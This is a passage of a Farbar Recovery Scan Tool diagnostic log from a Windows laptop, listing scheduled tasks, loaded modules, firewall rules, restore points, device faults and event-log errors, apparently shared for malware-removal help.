Task: {0339290B-4D0B-431D-A454-94460BABBE1F} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {03ECBFF5-C025-4739-8E50-8F4E8AEA2006} - System32\Tasks\Norton Identity Safe\Norton Error Analyzer => C:\Program Files (x86)\Norton Identity Safe\Engine\2014.7.3.12\SymErr.exe
Task: {14CBC00D-5A6F-4542-BA8F-F735F987065E} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
Task: {18F47D62-A171-49D0-9208-AFCD563ACBDE} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {20596B4E-B9FC-4C02-B636-29C81118AD7C} - System32\Tasks\{B8C8760C-1B7F-4B92-B355-EB4EBC2220B7} => C:\Program Files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientApp.exe [2011-11-24] (Amazon.com)
Task: {2A1EB5A9-CC18-47FE-8ED5-E8204F70F004} - System32\Tasks\{B28ABF54-12F8-454B-BECD-94AEA917E9D4} => pcalua.exe -a C:\Users\Lexi\Downloads\465-INST-WIN7-A.EXE -d "C:\Program Files (x86)\Mozilla Firefox"
Task: {30B217A2-ECDC-4497-B30E-BE246C50F52C} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe
Task: {3181DE33-4525-4033-8EFC-B3B2A102EEB2} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
Task: {31BD4F86-0AC8-44F3-8311-6D5F6E437CE8} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {3A39070B-05D6-4FE4-B21D-6AC28162EA77} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {3F4414FF-AF57-4A12-BB5E-25465C03328D} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {4333970D-7AC2-4816-B4D0-C6B4A5AA8B0D} - System32\Tasks\{792CD4C5-BD69-431C-ADFE-8FC291ABBC34} => C:\Program Files (x86)\Audible\Bin\Manager.exe [2010-10-18] (Audible Inc.)
Task: {4456371C-D5F3-4556-BD69-3DEA9486D8BC} - System32\Tasks\{19CE7EC7-A1CF-43F2-82BD-2B92DB574877} => C:\Program Files (x86)\Skype\\Phone\Skype.exe [2014-12-11] (Skype Technologies S.A.)
Task: {4A73AF0D-B415-4A75-A48F-59B950DD814F} - System32\Tasks\{13906491-9562-4215-BED2-2F749B84FCF0} => pcalua.exe -a C:\Users\Lexi\Downloads\ActiveSetupN(1).exe -d "C:\Program Files (x86)\Mozilla Firefox"
Task: {595AB45D-32BD-469C-AACD-876FC9D8B726} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-12] (Google Inc.)
Task: {5E3BB964-5022-4A1C-92A6-1C246AEA028E} - System32\Tasks\{840E3E90-DFDD-4516-8907-ADFF482BB6E4} => pcalua.exe -a C:\Users\Lexi\Downloads\ActiveSetupN.exe -d C:\Users\Lexi\Downloads
Task: {65E6396D-2E9E-4959-BF08-DB12AD2957C2} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {7A508896-C3CD-4300-BDAA-04953203925D} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
Task: {7AF5ABA6-423A-49B5-BA9D-1352F2D4DAED} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-12] (Google Inc.)
Task: {7CAD3314-D3AC-40CF-8B4F-15F972F88E57} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {846F76DA-20A7-45DD-80B6-63BABA67DE9D} - System32\Tasks\MotoHelper Routing => C:\Program Files (x86)\Motorola\MotoHelper\MotoHelperUpdate.exe [2010-09-07] ()
Task: {85AEFD4C-BB58-4309-AB1A-0D23D826D497} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {8DB4574F-93DB-4D60-8F3D-E6E9973D5190} - System32\Tasks\{6E6318EC-3D88-4C46-A836-8ED495DD7ED2} => pcalua.exe -a C:\windows\system32\pcwrun.exe -c "C:\Program Files (x86)\Audible\Bin\Manager.exe"
Task: {8E5B2A0F-FC8A-423A-A8BE-3D7AB86A9511} - System32\Tasks\Norton Identity Safe\Norton Error Processor => C:\Program Files (x86)\Norton Identity Safe\Engine\2014.7.3.12\SymErr.exe
Task: {9E9F9295-5A95-4BC1-92F1-538253A7EE57} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {A0E37C5A-0E9E-4E5A-97CF-3A8FF2419BED} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {A49859AB-948A-4879-843B-C6F8C597EE05} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe
Task: {AB79393A-65CD-45EF-A04C-516943694282} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {B0843801-EABC-4F14-836C-8D73C9CF75AA} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {B1EA027F-6C5F-4A60-922B-E3DF71943F1A} - System32\Tasks\Adobe Flash Player Updater => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-02-10] (Adobe Systems Incorporated)
Task: {B1EEF720-5581-431A-88EE-70AE9214EB06} - System32\Tasks\{579AE86B-2E4A-462C-A43D-A9CBDE59DABB} => pcalua.exe -a "C:\Users\Lexi\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\777U89LV\ActiveSetupN.exe" -d C:\Users\Lexi\Desktop
Task: {B7B1A35D-778B-4029-9785-944EAAEC7B62} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\MpCmdRun.exe
Task: {B7ED6DC7-D029-4C26-B746-C8CEA0220FCD} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {C63794CC-3FA0-4129-A703-499ADA72BAC0} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {C7018A72-D3B0-424D-8718-859D11159542} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-13] (Adobe Systems Incorporated)
Task: {CED787AA-FC52-4914-965F-EC58A361E401} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {D2897A28-62CA-4684-A5EB-DAF35E369FEC} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-03-09] (Microsoft Corporation)
Task: {D39FA133-57CC-4534-B9DB-8BF97AA4BF6D} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {D5830A36-AEE1-4246-B3A5-AD088300900D} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {D9980B66-B0B0-49C7-BAD6-1E56A17F63F4} - System32\Tasks\{F173C27D-4866-4D3F-8CF8-F4AA5838C42A} => pcalua.exe -a C:\Users\Lexi\Downloads\BodyMediaArmbandReset(1).exe -d C:\Users\Lexi\Downloads
Task: {DDD64684-16CC-4C8E-8741-D465C0D1EE60} - System32\Tasks\{2CC5D8DF-1473-45CC-BECD-C52847C8BD47} => pcalua.exe -a C:\Users\Lexi\Documents\OPS653v400B\OPS653ver400B\DSETUP.EXE -d C:\Users\Lexi\Documents\OPS653v400B\OPS653ver400B
Task: {E42C5FDB-7D30-4A22-A9C8-AA3457DA6D6D} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {F1BFB372-F5DF-4596-BEC2-F29A89056CE5} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {F840B761-34BF-4385-AE9A-F65F6D27E4B7} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {FE67C988-F7E5-4A52-94EE-E6C66EE41EAE} - System32\Tasks\{789ED4DD-0568-434B-88F2-2FB36DC7A2D7} => pcalua.exe -a C:\Users\Lexi\Documents\OPS653v400B\OPS653ver400B\DSETUP.EXE -d C:\Users\Lexi\Documents\OPS653v400B\OPS653ver400B

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2015-07-10 06:00 - 2015-07-10 06:00 - 00028160 _____ () C:\WINDOWS\SYSTEM32\efsext.dll
2015-08-27 23:59 - 2015-08-27 23:59 - 00032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
2015-09-12 13:07 - 2015-08-11 04:14 - 00404480 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
2011-04-11 09:37 - 2005-04-22 12:36 - 00143360 _____ () C:\WINDOWS\system32\BrSNMP64.dll
2015-09-30 22:08 - 2015-09-17 01:48 - 02494712 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2015-09-30 22:08 - 2015-09-17 01:48 - 02494712 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2012-11-26 22:54 - 2012-11-26 22:54 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2010-03-03 16:15 - 2010-03-03 16:15 - 08762680 _____ () C:\Program Files\TOSHIBA\FlashCards\BlackPng.dll
2009-11-03 15:26 - 2009-11-03 15:26 - 00053560 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnZ.dll
2010-03-03 16:15 - 2010-03-03 16:15 - 00019256 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnF10.dll
2010-03-03 16:15 - 2010-03-03 16:15 - 00019256 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnF11.dll
2010-05-28 20:34 - 2009-06-22 17:40 - 00022328 _____ () C:\Program Files\TOSHIBA\Toshiba Assist\NotifyX.dll
2009-03-12 21:08 - 2009-03-12 21:08 - 00048640 _____ () C:\Program Files (x86)\Toshiba\PCDiag\NotifyPCD.dll
2009-07-25 19:38 - 2009-07-25 19:38 - 00017800 _____ () C:\Program Files\TOSHIBA\TOSHIBA Disc Creator\NotifyTDC.dll
2009-01-30 20:11 - 2009-01-30 20:11 - 01091072 _____ () C:\Program Files\TOSHIBA\SmartFaceV\SmartFaceVCtrl.dll
2009-01-30 20:10 - 2009-01-30 20:10 - 01043456 _____ () C:\Program Files\TOSHIBA\SmartFaceV\FaceRec.dll
2009-01-30 20:11 - 2009-01-30 20:11 - 07861248 _____ () C:\Program Files\TOSHIBA\SmartFaceV\FaceHI.dll
2010-03-12 17:41 - 2010-03-12 17:41 - 00417080 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\TcrdKBB.exe
2010-02-05 19:44 - 2010-02-05 19:44 - 00079192 _____ () C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosIPCWraper.dll
2015-07-10 06:00 - 2015-07-10 06:00 - 00215352 _____ () c:\windows\system32\WerEtw.dll
2011-11-24 00:21 - 2011-11-24 00:21 - 00105576 ____R () C:\Program Files (x86)\Amazon\Amazon Unbox Video\LimelightDownloadManager.dll
2011-07-19 14:26 - 2008-11-12 14:32 - 00014848 _____ () C:\Program Files (x86)\PFU\ScanSnap\CardMinder\CardPath.dll
2015-12-01 15:37 - 2015-12-01 15:37 - 00439504 _____ () C:\Program Files (x86)\Evernote\Evernote\libxml2.dll
2015-12-01 15:37 - 2015-12-01 15:37 - 00321232 _____ () C:\Program Files (x86)\Evernote\Evernote\libtidy.dll
2014-02-01 13:30 - 2014-02-01 13:30 - 00861184 _____ () C:\Program Files (x86)\LeapFrog\LeapFrog Connect\platforms\qwindows.dll
2013-07-27 21:59 - 2016-03-09 14:44 - 00046080 _____ () C:\Users\Lexi\AppData\Local\Apps\2.0\2DJ030TV.4OO\2H60B505.COR\amaz..tion_f2fa081ea2183235_0002.0001_cb34a912a946f839\NativeOperations.dll
2016-03-09 10:18 - 2016-03-09 10:18 - 00541696 _____ () C:\Users\Lexi\AppData\Local\Temp\sqlite-3.7.2-sqlitejdbc.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\Users\Lexi\Documents\be you.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\be you.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\beyoubravely.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\beyoubravely.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell  back2.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell  back2.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - back.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - back.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - back.png:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - back.png:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - Front.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - Front.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\feather.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\feather.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\Guethler woordle.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\Guethler woordle.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\Guethler.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\Guethler.jpg:Updt_SummaryInformation [151]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Control Panel\Desktop\\Wallpaper -> c:\users\lexi\appdata\roaming\mozilla\firefox\desktop background.bmp
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

HKLM\...\StartupApproved\StartupFolder: => "Amazon Unbox.lnk"
HKLM\...\StartupApproved\StartupFolder: => "BodyMedia Sync.lnk"
HKLM\...\StartupApproved\StartupFolder: => "Audible Download Manager.lnk"
HKLM\...\StartupApproved\StartupFolder: => "ScanSnap Manager.lnk"
HKLM\...\StartupApproved\Run32: => "BrMfcWnd"
HKLM\...\StartupApproved\Run32: => "ControlCenter3"
HKLM\...\StartupApproved\Run32: => "Secure Online Account Numbers"
HKLM\...\StartupApproved\Run32: => "iTunesHelper"
HKLM\...\StartupApproved\Run32: => "ScanSnap WIA Service Checker"
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\StartupApproved\Run: => "FileThis Fetch"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
FirewallRules: [uDP Query User{E520D0E0-0828-42E1-9B8F-D3A6F8885E82}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [TCP Query User{1419A417-13D5-4702-BFD4-F63FBF5FFB87}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{A60CE462-6280-43D7-8043-4506596E8C0A}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{99C87474-2E7B-4132-BA2B-B13267F3602E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{766F3D6F-3D90-4128-ADE7-3B980ABF4B0F}] => (Allow) C:\Program Files (x86)\LeapFrog\LeapFrog Connect\LeapfrogConnect.exe
FirewallRules: [{7E7E8C92-1D6F-4F1B-84ED-326711765E73}] => (Allow) LPort=1900
FirewallRules: [{8839DD16-229F-4D59-AE9D-D31901B1A1E7}] => (Allow) LPort=2869
FirewallRules: [{CA4B34F1-7F78-44CA-9F85-C710F94C15D4}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [uDP Query User{89C13623-A2E8-4554-9ED3-A35ADD22F801}C:\users\lexi\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\lexi\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [TCP Query User{893572F9-21AA-4841-9065-1F2B956B3D19}C:\users\lexi\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\lexi\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [{7B09EC93-7311-42C7-9076-F9DCBCC8882F}] => (Allow) C:\Program Files (x86)\iTunes\iTunes.exe
FirewallRules: [{94AADD84-2E1F-4D28-ABA0-77B8E66501A9}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{B776F243-5D48-4D87-98C3-4AC5992C2636}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{29BCFEEB-BF5C-4E1F-9690-49538EFC5E9D}] => (Allow) LPort=54925
FirewallRules: [{921DE0EB-FDAD-4FDF-90D6-7E13B8596699}] => (Allow) C:\Program Files (x86)\Brother\Brmfl07a\FAXRX.exe
FirewallRules: [{17903D5B-36C6-4F8D-9832-003C6D005923}] => (Allow) C:\Program Files (x86)\Brother\Brmfl07a\FAXRX.exe
FirewallRules: [{E8406401-B39A-4877-B451-6D79C04CA923}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{D753ECEB-34A2-4DC5-AD5C-B1A0E93512DB}] => (Allow) C:\Program Files (x86)\Windows Live\Sync\WindowsLiveSync.exe
FirewallRules: [{044CAA22-7EB2-4B00-B629-31456C777E14}] => (Allow) svchost.exe
FirewallRules: [{F2FB915F-C948-46CF-B034-7FECCFF8B944}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{2B2D95DA-291D-427A-B6ED-25EB399F552F}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{119ED0AD-8AF0-4676-80D5-5166F5F371B3}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{C293909D-A688-4D73-AE69-CA0271E6FD70}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

26-02-2016 16:51:34 Scheduled Checkpoint
03-03-2016 23:14:19 Removed Storia.
07-03-2016 12:51:40 Restore Operation
09-03-2016 10:01:33 Restore Point Created by FRST

==================== Faulty Device Manager Devices =============

Name: JMicron PCIe xD Host Controller
Description: JMicron PCIe xD Host Controller
Class Guid: {4d36e970-e325-11ce-bfc1-08002be10318}
Manufacturer: JMicron Technology Corp.
Service: JMCR
Problem: : Currently, this hardware device is not connected to the computer. (Code 45).
Resolution: The device is not present or was previously attached to the computer.
To fix this problem, reconnect this hardware device to the computer.
If Device Manager is started with the environment variable DEVMGR_SHOW_NONPRESENT_DEVICES set to 1 (which means show these devices), then any previously attached (NONPRESENT) devices are displayed in the device list and assigned this error code.

Name: JMicron PCIe SD/MMC Host Controller
Description: JMicron PCIe SD/MMC Host Controller
Class Guid: {4d36e970-e325-11ce-bfc1-08002be10318}
Manufacturer: JMicron Technology Corp.
Service: JMCR
Problem: : Currently, this hardware device is not connected to the computer. (Code 45).
Resolution: The device is not present or was previously attached to the computer.
To fix this problem, reconnect this hardware device to the computer.
If Device Manager is started with the environment variable DEVMGR_SHOW_NONPRESENT_DEVICES set to 1 (which means show these devices), then any previously attached (NONPRESENT) devices are displayed in the device list and assigned this error code.

Name: JMicron PCIe MS Host Controller
Description: JMicron PCIe MS Host Controller
Class Guid: {4d36e970-e325-11ce-bfc1-08002be10318}
Manufacturer: JMicron Technology Corp.
Service: JMCR
Problem: : Currently, this hardware device is not connected to the computer. (Code 45).
Resolution: The device is not present or was previously attached to the computer.
To fix this problem, reconnect this hardware device to the computer.
If Device Manager is started with the environment variable DEVMGR_SHOW_NONPRESENT_DEVICES set to 1 (which means show these devices), then any previously attached (NONPRESENT) devices are displayed in the device list and assigned this error code.


==================== Event log errors: =========================

Application errors:
==================
Error: (03/09/2016 02:56:54 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DURABLE)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (03/09/2016 02:56:54 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DURABLE)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (03/09/2016 02:56:54 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DURABLE)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (03/09/2016 02:56:54 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DURABLE)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (03/09/2016 02:56:54 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DURABLE)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (03/09/2016 02:56:54 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DURABLE)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (03/09/2016 02:56:54 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DURABLE)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (03/09/2016 02:56:54 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DURABLE)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (03/09/2016 02:56:54 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DURABLE)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (03/09/2016 02:56:54 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DURABLE)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.


System errors:
=============
Error: (03/09/2016 02:56:54 PM) (Source: DCOM) (EventID: 10010) (User: DURABLE)
Description: CortanaUI.AppXvnpnd8twsw5e3tvxsft49zej2zv793mw.mca

Error: (03/09/2016 02:56:54 PM) (Source: DCOM) (EventID: 10010) (User: DURABLE)
Description: CortanaUI.AppXvnpnd8twsw5e3tvxsft49zej2zv793mw.mca

Error: (03/09/2016 02:56:54 PM) (Source: DCOM) (EventID: 10010) (User: DURABLE)
Description: CortanaUI.AppXvnpnd8twsw5e3tvxsft49zej2zv793mw.mca

Error: (03/09/2016 02:56:54 PM) (Source: DCOM) (EventID: 10010) (User: DURABLE)
Description: CortanaUI.AppXvnpnd8twsw5e3tvxsft49zej2zv793mw.mca

Error: (03/09/2016 02:56:54 PM) (Source: DCOM) (EventID: 10010) (User: DURABLE)
Description: CortanaUI.AppXvnpnd8twsw5e3tvxsft49zej2zv793mw.mca

Error: (03/09/2016 02:56:54 PM) (Source: DCOM) (EventID: 10010) (User: DURABLE)
Description: CortanaUI.AppXvnpnd8twsw5e3tvxsft49zej2zv793mw.mca

Error: (03/09/2016 02:56:54 PM) (Source: DCOM) (EventID: 10010) (User: DURABLE)
Description: CortanaUI.AppXvnpnd8twsw5e3tvxsft49zej2zv793mw.mca

Error: (03/09/2016 02:56:54 PM) (Source: DCOM) (EventID: 10010) (User: DURABLE)
Description: CortanaUI.AppXvnpnd8twsw5e3tvxsft49zej2zv793mw.mca

Error: (03/09/2016 02:56:54 PM) (Source: DCOM) (EventID: 10010) (User: DURABLE)
Description: CortanaUI.AppXvnpnd8twsw5e3tvxsft49zej2zv793mw.mca

Error: (03/09/2016 02:56:53 PM) (Source: DCOM) (EventID: 10010) (User: DURABLE)
Description: CortanaUI.AppXvnpnd8twsw5e3tvxsft49zej2zv793mw.mca


CodeIntegrity:
===================================
  Date: 2016-03-09 14:55:30.886
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-09 14:55:30.770
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-09 14:55:20.458
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-09 14:55:20.249
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-09 11:41:44.730
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-09 11:41:44.619
